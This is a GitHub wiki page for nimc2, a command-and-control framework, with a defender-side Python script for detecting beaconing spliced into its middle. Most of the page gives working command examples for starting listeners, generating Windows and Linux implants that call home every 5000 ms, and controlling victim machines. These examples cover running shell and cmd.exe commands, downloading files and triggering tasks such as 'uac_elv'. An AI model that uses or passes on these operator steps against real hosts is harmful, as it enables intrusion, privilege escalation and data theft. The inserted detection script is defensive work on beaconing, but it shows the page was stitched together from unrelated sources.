andrei edited this page Jul 18, 2022 · 15 revisions
  • The nimc2 server is based on a command line interface and it can be started using the ./server.sh bash script in the root directory.
  • You can type your commands as soon as you see the nimc2 main prompt: (main) nimc2 >

Creating a listener

To create a listener, use the startlistener command. Only TCP listeners are currently supported. You can start a TCP listener with the following command: startlistener tcp tcp_main --ip:(ip) --port:(port). Examples:

  • startlistener tcp tcp_main --ip:127.0.0.1 --port:1337: start a TCP listener listening on 127.0.0.1:1337 named tcp_main
  • startlistener tcp tcp_main -i:0.0.0.0 -p:1337: start a TCP listener listening on any address, port 1337 named tcp_main
  • startlistener tcp tcp_main -i:192.168.0.19 -p:1337: start a TCP listener listening on 192.168.0.19:1337 named tcp_main

Once you have created your listener, you can view it using the listeners command.

Generating an implant

Generating an implant is also very easy and only takes one command: generateimplant --type:(listener type) --ip:(ip) --port:(port) --platform:(platform) or generateimplant --listener:(listener type) --platform:(platform). Examples:

  • generateimplant -t:tcp -i:127.0.0.1 -p:1337 -P:windows: generate an implant for windows, connecting to 127.0.0.1:1337
  • generateimplant -t:tcp -i:127.0.0.1 -p:1337 -P:linux: generate an implant for linux, connecting to 127.0.0.1:1337
  • generateimplant -l:tcp_main -P:linux: generate an implant for linux, connecting to the tcp_main listener
  • generateimplant -l:tcp_main -P:windows: generate an implant for windows, connecting to the tcp_main listener

Clients will try to auto-connect to your server every 5000 ms. You can change this interval using the -t argument of the generateimplant command.
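From the defender's side, a client that reconnects on a fixed timer leaves a recognisable trace: connection attempts to the same destination whose inter-arrival times barely vary. The following script is an added example, not part of nimc2 or this wiki; it groups connection records by source and destination and flags flows whose gaps cluster tightly around one value. The log format and all addresses in SAMPLE_LOG are constructed for the example, and the 0.1 coefficient-of-variation threshold is an assumed starting point to tune against real traffic.

```python
"""Flag fixed-interval beaconing in constructed connection logs.

Added, defender-side example (not nimc2 code). A timer-driven
reconnect, such as the 5000 ms default described above, produces
connection attempts with near-identical gaps. We compute the gaps per
(source, destination) flow and flag flows whose gaps have a very low
coefficient of variation (stdev / median).
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample records: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port>"
# The first flow reconnects every ~5 s; the second is irregular browsing.
SAMPLE_LOG = """\
2022-07-18T10:00:00.000 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:05.012 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:10.003 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:15.020 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:19.998 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:25.007 10.0.0.5 -> 203.0.113.10:1337
2022-07-18T10:00:01.000 10.0.0.7 -> 198.51.100.20:443
2022-07-18T10:00:09.500 10.0.0.7 -> 198.51.100.20:443
2022-07-18T10:00:11.200 10.0.0.7 -> 198.51.100.20:443
2022-07-18T10:00:40.000 10.0.0.7 -> 198.51.100.20:443
2022-07-18T10:00:41.300 10.0.0.7 -> 198.51.100.20:443
2022-07-18T10:01:20.000 10.0.0.7 -> 198.51.100.20:443
"""


def parse_log(text):
    """Return {(src, dst): [datetime, ...]} from the constructed log format."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _arrow, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(timestamps):
    """Return (median_gap_seconds, coefficient_of_variation) for one flow.

    Returns None when there are too few events to judge regularity.
    """
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    median = statistics.median(gaps)
    if median <= 0:
        return None
    return median, statistics.pstdev(gaps) / median


def find_beacons(text, max_cv=0.1, min_events=4):
    """Return [(src, dst, median_gap_seconds)] for flows that look timer-driven.

    max_cv is an assumed threshold: gaps whose spread is under 10% of the
    median are treated as regular enough to report.
    """
    hits = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_events:
            continue
        score = beacon_score(stamps)
        if score is None:
            continue
        median, cv = score
        if cv <= max_cv:
            hits.append((src, dst, round(median, 2)))
    return hits


if __name__ == "__main__":
    for src, dst, interval in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every ~{interval}s")
```

Run against real flow or proxy logs, the parser is the only part that needs adapting; the regularity test itself is format-independent. Implants that add jitter to the interval will raise the coefficient of variation, so the threshold should be set from the distribution of gaps seen in your own environment rather than taken as fixed.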

Interacting with clients

When a client connects to your server, a log message informs you. You can view the clients connected to your server using 2 commands:

  • clients will show you all the clients that have connected, including those currently connected.
  • listeners --clients will show you all the listeners along with the clients connected to each of them. This is useful to see how your clients are connected to your server.

You can begin interacting with a client using the interact command. Example:

  • interact 0: start an interaction with the client with ID 0

You will notice that your prompt changed to something like this: (username@hostname) nimc2 >. This means you are currently interacting with a client and can send commands to it, for example:

  • shell: enter shell mode; all commands entered afterwards (except back, which exits shell mode) will be sent using shell [command]
  • shell "whoami": run whoami on the client
  • download "c:\users\andrei\desktop\flag": download the c:\users\andrei\desktop\flag file
  • msgbox "[title]" "[caption]": send a message box (only windows supported!)
  • cmd "[command]": run a command via cmd.exe (only windows supported!)

The default implant has many other custom tasks. They can be enumerated using the sendtask enumtasks command. Once you have the list of tasks, you can run sendtask uac_elv (for example) to trigger any task you want. Some tasks take parameters, which you supply using the other arguments of the sendtask command: sendtask shell "whoami /all" (for example). If you want to see what arguments a task accepts, you will have to look at the source code of that task.

Getting more help

You can use the help command to print all commands and help [command name] to get more info about a specific command.